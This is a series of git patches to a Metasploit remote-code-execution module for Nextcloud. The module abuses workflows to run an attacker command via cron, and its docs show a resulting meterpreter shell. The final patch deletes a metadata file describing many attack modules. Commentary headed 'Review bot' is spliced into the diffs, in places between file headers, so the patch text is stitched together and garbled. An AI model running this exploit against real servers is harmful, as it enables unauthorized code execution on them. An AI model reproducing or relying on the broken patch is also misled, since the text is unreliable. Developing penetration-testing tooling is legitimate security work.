diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 1eaef404617a1..eda157fa7e988 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -221,7 +221,7 @@ def execute_command(cmd, _opts = {})
 temp_filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt"
 flow_id = create_workflow(cmd.to_s)
- fail_with(Failure::Unreachable, 'Unable to create workflow') if flow_id.nil?
+ fail_with(Failure::UnexpectedReply, 'Unable to create workflow') if flow_id.nil?
 print_good('Workflow created')
 upload_file(temp_filename)
From 2ba8e1c255606da1f179db222582e7f6b82f1308 Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Mon, 5 May 2025 13:21:48 +0000
Subject: [PATCH 15/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: msutovsky-r7
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index eda157fa7e988..58fb276af72ee 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
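Review bot: `upload_file(temp_filename)` is now called synchronously, but its response is still discarded, so a failed PUT (no session cookie sent, quota exceeded, wrong path) leaves the module waiting out the full `ListenerTimeout` with no hint why; capture the result and check it, e.g. `res = upload_file(temp_filename)` followed by `fail_with(Failure::UnexpectedReply, 'File upload failed') unless res && [201, 204].include?(res.code)` (WebDAV answers 201 for a newly created resource and 200/204 for an overwrite — confirm against the target). `upload_file` itself sends no `'data'`, so the trigger file is created empty, which is enough for the postCreate event but deserves a one-line comment in that method so nobody "fixes" it. The start and end of `execute_command` are outside this hunk.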
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -88,7 +88,7 @@ def authenticate(user, pass)
 )
 @token = parse_token(res)
- fail_with(Failure::Unreachable, 'Request Token not found') if @token.nil?
+ fail_with(Failure::UnexpectedReply, 'Request Token not found') if @token.nil?
 data = "user=#{user}&password=#{pass}&requesttoken=#{@token}"
From 83786100b33366c8338789466244dcdd3ab78730 Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Mon, 5 May 2025 13:22:14 +0000
Subject: [PATCH 16/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: msutovsky-r7
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 58fb276af72ee..adba4c636e222 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -99,7 +99,7 @@ def authenticate(user, pass)
 'keep_cookies' => true
 )
- fail_with(Failure::Unreachable, 'Login failed') if res.nil? || res.code == 401
+ fail_with(Failure::NoAccess, 'Login failed') if res.nil? || res.code == 401
 end
 def request_token
From 9b0aee41f4e9dbb0d787571a45b7f90e61f91bbb Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Mon, 5 May 2025 13:22:27 +0000
Subject: [PATCH 17/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: msutovsky-r7
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index adba4c636e222..79f6aa2c853b8 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
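Review bot: The second hunk now reports `res.nil?` and `res.code == 401` under a single `Failure::NoAccess`, but a nil response means the server never answered — the `Failure::Unreachable` case the previous line described — so the two should stay apart: `fail_with(Failure::Unreachable, 'No response to login request') if res.nil?` followed by `fail_with(Failure::NoAccess, 'Login failed') if res.code == 401`. Whether a wrong password actually produces a 401 here is not something the hunk shows (Nextcloud's form login commonly redirects back to the login page instead), so the later workflow request is effectively the credential check; a comment stating that assumption, e.g. `# A 401 is only one failure mode; bad credentials are also caught by the first OCS request`, would help the next reader. The rest of `authenticate` is outside this hunk.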
@@ -139,9 +139,7 @@ def create_workflow(operation)
 'keep_cookies' => true
 )
- fail_with(Failure::Unreachable, 'Unable to create workflow') if res.nil?
-
- fail_with(Failure::Unreachable, 'Login failed') unless res.code == 200
+ fail_with(Failure::NoAccess, 'Login failed') unless res&.code == 200
 json_data = res.get_json_document
 flow_id = json_data.dig('ocs', 'data', 'id')
 flow_id
From ad9651db5d51e2595255e17e3132dc28a6187b2a Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Mon, 5 May 2025 13:22:50 +0000
Subject: [PATCH 18/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
Co-authored-by: msutovsky-r7
---
 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index 79f6aa2c853b8..d6cb9a8d5de45 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -110,7 +110,7 @@ def request_token
 )
 @token = res.get_json_document['token']
- fail_with(Failure::Unreachable, '2: Request Token not found') if @token.nil?
+ fail_with(Failure::UnexpectedReply, '2: Request Token not found') if @token.nil?
 end
 def create_workflow(operation)
From 09aaf5865c5910d11824cc4ee37a61b6ce46bbdb Mon Sep 17 00:00:00 2001
From: whotwagner
Date: Mon, 5 May 2025 15:33:25 +0000
Subject: [PATCH 19/27] Rearranged code and removed wait_for_payload_session
---
 .../unix/webapp/nextcloud_workflows_rce.md | 7 ++-
 .../unix/webapp/nextcloud_workflows_rce.rb | 45 ++++++++-----------
 2 files changed, 22 insertions(+), 30 deletions(-)
diff --git a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md
index d69c15c02b817..6beb988b28bff 100644
--- a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md
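Review bot: Folding the nil check into `unless res&.code == 200` labels three different outcomes as `Failure::NoAccess, 'Login failed'`: no response at all, a genuine auth failure, and any other non-200 reply (a server error, or a rejected workflow definition). Since `check` relies on this method, the distinction decides what the operator is told; split it into `fail_with(Failure::Unreachable, 'No response from workflow API') if res.nil?`, `fail_with(Failure::NoAccess, 'Login failed') if res.code == 401` and `fail_with(Failure::UnexpectedReply, "Unexpected status #{res.code} from workflow API") unless res.code == 200`. The request at the top of `create_workflow` is outside this hunk.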
+++ b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md
@@ -100,10 +100,6 @@ Example steps in this format (is also in the PR):
 Remote web path to the nextcloud installation (default: /)
-### ListenerTimeout
-
-Number of seconds to wait for the exploit to connect back (default: 960)
-
 ### USERNAME
 The low-privileged username to authenticate to nextcloud
@@ -147,3 +143,6 @@ msf6 exploit(unix/webapp/nextcloud_workflows_rce) > run
 meterpreter > getuid
 Server username: www-data
 ```
+
+## Limitations
+Ensure that your `WfsDelay` advanced option is set to a value that allows `cron` to execute the payload. Default is 16 minutes
diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
index d6cb9a8d5de45..6569f8f4a42fb 100644
--- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
+++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb
@@ -50,6 +50,7 @@ def initialize(info = {})
 ],
 'Privileged' => false,
 'DisclosureDate' => '2023-03-30',
+ 'DefaultOptions' => { 'WfsDelay' => 16.minutes.seconds.to_i },
 'DefaultTarget' => 0,
 'Notes' => {
 'Stability' => [CRASH_SAFE],
@@ -62,7 +63,6 @@ def initialize(info = {})
 register_options(
 [
 OptString.new('TARGETURI', [true, 'Path to nextcloud', '/']),
- OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit to connect back', 960]),
 OptString.new('USERNAME', [true, 'The username to authenticate as']),
 OptString.new('PASSWORD', [true, 'The password to authenticate with'])
 ]
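Review bot: `16.minutes.seconds.to_i` in the new `'DefaultOptions'` entry takes a detour through ActiveSupport that `16.minutes.to_i` already covers; as far as I can tell `.seconds` is not a method of Duration and only works by falling through to the Integer value, so `'WfsDelay' => 16.minutes.to_i` (or the plain `960` the removed `ListenerTimeout` default used) is the direct form — worth confirming before relying on it. Nothing in the code explains why the wait is this long now that the explicit polling loop is gone; a comment next to the entry, e.g. `# The command runs only when the target's cron.php next executes the workflow, so give the handler a long wait`, keeps that knowledge out of the docs file alone. The rest of `initialize` lies outside these hunks.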
@@ -171,21 +171,6 @@ def delete_file(user, filename)
 )
 end
-# At the end of the module, especially for reverse_tcp payloads, wait for
-# the payload to connect back to us. There's a very high probability we
-# will lose the payload's signal otherwise.
-#
-# copied from: linux/http/huawei_hg532n_cmdinject.rb
-#
-def wait_for_payload_session
-print_status 'Waiting for the payload to connect back ..'
-created = retry_until_truthy(timeout: datastore['ListenerTimeout']) do
-session_created?
-end
-fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') unless created
-print_good 'Payload connected!'
-end
-
 def check
 # For the check command
 cookie_jar.clear
@@ -216,21 +201,29 @@ def exploit
 def execute_command(cmd, _opts = {})
 print_status('Sending payload..')
-temp_filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt"
-flow_id = create_workflow(cmd.to_s)
+@temp_filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt"
+@flow_id = create_workflow(cmd.to_s)
-fail_with(Failure::UnexpectedReply, 'Unable to create workflow') if flow_id.nil?
+fail_with(Failure::UnexpectedReply, 'Unable to create workflow') if @flow_id.nil?
 print_good('Workflow created')
-upload_file(temp_filename)
+upload_file(@temp_filename)
+end
-wait_for_payload_session
+def need_cleanup?
+defined?(@temp_filename) && @temp_filename
+end
-if flow_id
-print_status('Cleaning up')
-delete_workflow(flow_id)
-end
+def cleanup
+super
+return unless need_cleanup?
+
+print_status('Cleaning up')
+
+delete_workflow(@flow_id) if defined?(@flow_id) && @flow_id
+delete_file(datastore['USERNAME'], @temp_filename) if defined?(@temp_filename) && @temp_filename
-delete_file(datastore['USERNAME'], temp_filename)
+@flow_id = nil
+@temp_filename = nil
 end
 end
From 09fc4353461acdfbd531e4bb2686648c99e5a3cb Mon Sep 17 00:00:00 2001
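Review bot: `@temp_filename` is assigned before `create_workflow` runs in the `@@ -216,21 +201,29 @@` hunk, so when workflow creation aborts via `fail_with` the `cleanup` path the hunk introduces sees `need_cleanup?` as true and calls `delete_file` for a file that was never uploaded. Assign the name only after `upload_file` returns, and let `need_cleanup?` consider `@flow_id` as well so a workflow created before a failed upload is still removed. The `defined?(@ivar) && @ivar` guards are redundant in Ruby, since an unset instance variable reads as `nil`; `if @flow_id` and `if @temp_filename` suffice. If `delete_workflow` raises, `delete_file` is skipped and the uploaded file stays on the target; I cannot see those helpers from here, so whether they `fail_with` is an assumption, but the two cleanup steps are independent and worth isolating from each other. The pure removal in the `@@ -171,21 +171,6 @@` hunk is consistent with the `ListenerTimeout` option dropped earlier in this patch.
```ruby
def execute_command(cmd, _opts = {})
  # … unchanged: print_status, create_workflow, fail_with, print_good …
  filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt"
  upload_file(filename)
  # Recorded only once the upload has gone through, so cleanup never tries
  # to delete a file that was never created.
  @temp_filename = filename
end

def need_cleanup?
  !@flow_id.nil? || !@temp_filename.nil?
end

def cleanup
  # … unchanged: super, need_cleanup? guard, print_status …
  delete_workflow(@flow_id) if @flow_id
  delete_file(datastore['USERNAME'], @temp_filename) if @temp_filename
  # … unchanged: reset @flow_id / @temp_filename …
end
```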
From: whotwagner Date: Mon, 5 May 2025 16:05:12 +0000 Subject: [PATCH 20/27] Removed db/modules_metadata_base.json from --- db/modules_metadata_base.json | 254129 ------------------------------- 1 file changed, 254129 deletions(-) delete mode 100644 db/modules_metadata_base.json diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json deleted file mode 100644 index 8a4984f1c3fad..0000000000000 --- a/db/modules_metadata_base.json +++ /dev/null 
@@ -1,254129 +0,0 @@ -{ - "auxiliary_admin/2wire/xslt_password_reset": { - "name": "2Wire Cross-Site Request Forgery Password Reset Vulnerability", - "fullname": "auxiliary/admin/2wire/xslt_password_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-08-15", - "type": "auxiliary", - "author": [ - "hkm ", - "Travis Phillips" - ], - "description": "This module will reset the admin password on a 2Wire wireless router. This is\n done by using the /xslt page where authentication is not required, thus allowing\n configuration changes (such as resetting the password) as administrators.", - "references": [ - "CVE-2007-4387", - "OSVDB-37667", - "BID-36075", - "URL-https://seclists.org/bugtraq/2007/Aug/225" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/2wire/xslt_password_reset.rb", - "is_install_path": true, - "ref_name": "admin/2wire/xslt_password_reset", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/android/google_play_store_uxss_xframe_rce": { - "name": "Android Browser RCE Through Google Play Store XFO", - "fullname": "auxiliary/admin/android/google_play_store_uxss_xframe_rce", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Rafay Baloch", - "joev " - ], - "description": "This module combines two vulnerabilities to achieve remote code\n execution on affected Android devices. First, the module exploits\n CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n versions of Android's open source stock browser (the AOSP Browser) prior to\n 4.4. 
Second, the Google Play store's web interface fails to enforce a\n X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n targeted for script injection. As a result, this leads to remote code execution\n through Google Play's remote installation feature, as any application available\n on the Google Play store can be installed and launched on the user's device.\n\n This module requires that the user is logged into Google with a vulnerable browser.\n\n To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.", - "references": [ - "URL-http://web.archive.org/web/20230321034739/https://www.rapid7.com/blog/post/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041/", - "URL-https://web.archive.org/web/20150316151817/http://1337day.com/exploit/description/22581", - "OSVDB-110664", - "CVE-2014-6041" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb", - "is_install_path": true, - "ref_name": "admin/android/google_play_store_uxss_xframe_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_admin/appletv/appletv_display_image": { - "name": "Apple TV Image Remote Control", - "fullname": "auxiliary/admin/appletv/appletv_display_image", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "0a29406d9794e4f9b30b3c5d6702c708", - "sinn3r " - ], - "description": "This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. 
For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.", - "references": [ - "URL-http://nto.github.io/AirPlay.html" - ], - "platform": "", - "arch": "", - "rport": 7000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/appletv/appletv_display_image.rb", - "is_install_path": true, - "ref_name": "admin/appletv/appletv_display_image", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/appletv/appletv_display_video": { - "name": "Apple TV Video Remote Control", - "fullname": "auxiliary/admin/appletv/appletv_display_video", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "0a29406d9794e4f9b30b3c5d6702c708", - "sinn3r " - ], - "description": "This module plays a video on an AppleTV device. Note that\n AppleTV can be somewhat picky about the server that hosts the video.\n Tested servers include default IIS, default Apache, and Ruby's WEBrick.\n For WEBrick, the default MIME list may need to be updated, depending on\n what media file is to be played. Python SimpleHTTPServer is not\n recommended. Also, if you're playing a video, the URL must be an IP\n address. Some AppleTV devices are actually password-protected; in that\n case please set the PASSWORD datastore option. 
For password\n brute forcing, please see the module auxiliary/scanner/http/appletv_login.", - "references": [ - "URL-http://nto.github.io/AirPlay.html" - ], - "platform": "", - "arch": "", - "rport": 7000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/appletv/appletv_display_video.rb", - "is_install_path": true, - "ref_name": "admin/appletv/appletv_display_video", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/atg/atg_client": { - "name": "Veeder-Root Automatic Tank Gauge (ATG) Administrative Client", - "fullname": "auxiliary/admin/atg/atg_client", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jon Hart " - ], - "description": "This module acts as a simplistic administrative client for interfacing\n with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n the TLS-250 and TLS-350 protocols. 
This has been tested against\n GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n been tested against anything else, so use at your own risk.", - "references": [ - "URL-https://www.rapid7.com/blog/post/2015/01/22/the-internet-of-gas-station-tank-gauges/", - "URL-https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment", - "URL-https://github.com/sjhilt/GasPot", - "URL-https://github.com/mushorg/conpot", - "URL-https://www.veeder.com/us/automatic-tank-gauge-atg-consoles", - "URL-https://cdn.chipkin.com/files/liz/576013-635.pdf", - "URL-https://docs.veeder.com/gold/download.cfm?doc_id=6227" - ], - "platform": "", - "arch": "", - "rport": 10001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/atg/atg_client.rb", - "is_install_path": true, - "ref_name": "admin/atg/atg_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ALARM", - "description": "I30200 Sensor alarm history (untested)" - }, - { - "name": "ALARM_RESET", - "description": "IS00300 Remote alarm reset (untested)" - }, - { - "name": "CLEAR_RESET", - "description": "IS00200 Clear Reset Flag (untested)" - }, - { - "name": "DELIVERY", - "description": "I20200 Delivery report" - }, - { - "name": "INVENTORY", - "description": "200/I20100 In-tank inventory report" - }, - { - "name": "LEAK", - "description": "I20300 Leak report" - }, - { - "name": "RELAY", - "description": "I40600 Relay status (untested)" - }, - { - "name": "RESET", - "description": "IS00100 Reset (untested)" - }, - { - "name": "SENSOR", - "description": "I30100 Sensor status (untested)" - }, - { - "name": "SENSOR_DIAG", - "description": "IB0100 Sensor diagnostics (untested)" - }, - { - "name": "SET_TANK_NAME", - "description": "S602 set tank name (use 
TANK_NUMBER and TANK_NAME options)" - }, - { - "name": "SHIFT", - "description": "I20400 Shift report" - }, - { - "name": "STATUS", - "description": "I20500 In-tank status report" - }, - { - "name": "SYSTEM_STATUS", - "description": "I10100 System status report (untested)" - }, - { - "name": "TANK_ALARM", - "description": "I20600 Tank alarm history (untested)" - }, - { - "name": "TANK_DIAG", - "description": "IA0100 Tank diagnostics (untested)" - }, - { - "name": "VERSION", - "description": "Version information" - } - ] - }, - "auxiliary_admin/aws/aws_launch_instances": { - "name": "Launches Hosts in AWS", - "fullname": "auxiliary/admin/aws/aws_launch_instances", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Javier Godinez " - ], - "description": "This module will attempt to launch an AWS instances (hosts) in EC2.", - "references": [ - "URL-https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ", - "URL-https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/aws/aws_launch_instances.rb", - "is_install_path": true, - "ref_name": "admin/aws/aws_launch_instances", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/backupexec/dump": { - "name": "Veritas Backup Exec Windows Remote File Access", - "fullname": "auxiliary/admin/backupexec/dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm ", - "Unknown" - ], - "description": "This module abuses a logic flaw in the Backup Exec Windows Agent to download\n arbitrary files from 
the system. This flaw was found by someone who wishes to\n remain anonymous and affects all known versions of the Backup Exec Windows Agent. The\n output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program\n listed in the references section. To transfer an entire directory, specify a\n path that includes a trailing backslash.", - "references": [ - "CVE-2005-2611", - "OSVDB-18695", - "BID-14551", - "URL-https://web.archive.org/web/20120227144337/http://www.fpns.net/willy/msbksrc.lzh" - ], - "platform": "", - "arch": "", - "rport": 10000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/backupexec/dump.rb", - "is_install_path": true, - "ref_name": "admin/backupexec/dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Download", - "description": "Download arbitrary file" - } - ] - }, - "auxiliary_admin/backupexec/registry": { - "name": "Veritas Backup Exec Server Registry Access", - "fullname": "auxiliary/admin/backupexec/registry", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This modules exploits a remote registry access flaw in the BackupExec Windows\n Server RPC service. 
This vulnerability was discovered by Pedram Amini and is based\n on the NDR stub information posted to openrce.org.\n Please see the action list for the different attack modes.", - "references": [ - "OSVDB-17627", - "CVE-2005-0771", - "URL-https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269" - ], - "platform": "", - "arch": "", - "rport": 6106, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/backupexec/registry.rb", - "is_install_path": true, - "ref_name": "admin/backupexec/registry", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Create Logon Notice", - "description": "Add a logon notice" - }, - { - "name": "System Information", - "description": "Dump system info (user, owner, OS, CPU...)" - } - ] - }, - "auxiliary_admin/chromecast/chromecast_reset": { - "name": "Chromecast Factory Reset DoS", - "fullname": "auxiliary/admin/chromecast/chromecast_reset", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "wvu " - ], - "description": "This module performs a factory reset on a Chromecast, causing a denial of service (DoS).\n No user authentication is required.", - "references": [ - "URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html" - ], - "platform": "", - "arch": "", - "rport": 8008, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/chromecast/chromecast_reset.rb", - "is_install_path": true, - "ref_name": "admin/chromecast/chromecast_reset", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Reboot", - "description": "Reboot only" - }, - { - "name": "Reset", - "description": "Factory reset" - } - ] - }, - "auxiliary_admin/chromecast/chromecast_youtube": { - "name": "Chromecast YouTube Remote Control", - "fullname": "auxiliary/admin/chromecast/chromecast_youtube", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "wvu " - ], - "description": "This module acts as a simple remote control for Chromecast YouTube.\n\n Only the deprecated DIAL protocol is supported by this module.\n Casting via the newer CASTV2 protocol is unsupported at this time.", - "references": [ - "URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html" - ], - "platform": "", - "arch": "", - "rport": 8008, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2019-05-29 12:19:52 +0000", - "path": "/modules/auxiliary/admin/chromecast/chromecast_youtube.rb", - "is_install_path": true, - "ref_name": "admin/chromecast/chromecast_youtube", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Play", - "description": "Play video" - }, - { - "name": "Stop", - "description": "Stop video" - } - ] - }, - "auxiliary_admin/citrix/citrix_netscaler_config_decrypt": { - "name": "Decrypt Citrix NetScaler Config Secrets", - "fullname": "auxiliary/admin/citrix/citrix_netscaler_config_decrypt", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-05-19", - "type": "auxiliary", - "author": [ - "npm " - ], - "description": "This module takes a Citrix NetScaler ns.conf configuration file as\n input and extracts secrets that have been stored with reversible\n encryption. 
The module supports legacy NetScaler encryption (RC4)\n as well as the newer AES-256-ECB and AES-256-CBC encryption types.\n It is also possible to decrypt secrets protected by the Key\n Encryption Key (KEK) method, provided the key fragment files F1.key\n and F2.key are provided.", - "references": [ - "URL-https://dozer.nz/posts/citrix-decrypt/", - "URL-https://www.ferroquesystems.com/resource/citrix-adc-security-kek-files/" - ], - "platform": "BSD", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb", - "is_install_path": true, - "ref_name": "admin/citrix/citrix_netscaler_config_decrypt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Dump", - "description": "Dump secrets from NetScaler configuration" - } - ] - }, - "auxiliary_admin/db2/db2rcmd": { - "name": "IBM DB2 db2rcmd.exe Command Execution Vulnerability", - "fullname": "auxiliary/admin/db2/db2rcmd", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-03-04", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits a vulnerability in the Remote Command Server\n component in IBM's DB2 Universal Database 8.1. 
An authenticated\n attacker can send arbitrary commands to the DB2REMOTECMD named pipe\n which could lead to administrator privileges.", - "references": [ - "CVE-2004-0795", - "OSVDB-4180", - "BID-9821" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/admin/db2/db2rcmd.rb", - "is_install_path": true, - "ref_name": "admin/db2/db2rcmd", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/dcerpc/cve_2020_1472_zerologon": { - "name": "Netlogon Weak Cryptographic Authentication", - "fullname": "auxiliary/admin/dcerpc/cve_2020_1472_zerologon", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Tom Tervoort", - "Spencer McIntyre", - "Dirk-jan Mollema" - ], - "description": "A vulnerability exists within the Netlogon authentication process where the security properties granted by AES\n are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker\n can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts\n using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability\n to reset the machine account password to an empty string, which will then allow the attacker to authenticate as\n the machine account. After exploitation, it's important to restore this password to it's original value. 
